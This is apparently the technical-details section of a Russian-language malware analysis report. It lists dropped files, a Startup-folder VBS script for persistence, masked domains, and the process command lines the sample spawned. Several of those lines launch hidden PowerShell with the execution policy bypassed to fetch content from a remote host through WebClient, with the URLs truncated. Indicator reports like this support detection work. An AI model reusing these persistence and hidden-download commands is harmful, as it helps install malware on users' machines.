Техническая информация (ниже перечислены пути к файлам, сетевые обращения и командные строки процессов)
- %APPDATA%\microsoft\windows\start menu\programs\startup\network.vbs (папка автозагрузки: скрипт запускается при входе пользователя в систему)
- %TEMP%\bb.vbs
- %TEMP%\installer.exe
- %TEMP%\nsm4eff.tmp
- %TEMP%\nsb4f0f.tmp\nsishelper.dll
- %TEMP%\nsb4f0f.tmp\system.dll
- %TEMP%\nsb4f0f.tmp\userinfo.dll
- %TEMP%\nsb4f0f.tmp\nsisdl.dll
- %TEMP%\nsb4f0f.tmp\inst_start
- %TEMP%\nsb4f0f.tmp\modern-header.bmp
- %TEMP%\nsb4f0f.tmp\nsdialogs.dll
- %TEMP%\outofprocreport1325477.txt
- %TEMP%\nsb4f0f.tmp\inst_start
- http://www.yo######ownloadersite.com/images/pixel.gif?ac#########################################################################################################################################
- DNS ASK yo######ownloadersite.com
- DNS ASK 6.###4top.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\bb.vbs"
- '%TEMP%\installer.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('ht...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://6.top4to... (чтение содержимого по HTTPS через System.Net.WebClient; адрес в источнике обрезан)
- '<SYSTEM32>\wermgr.exe' "-outproc" "908" "1284"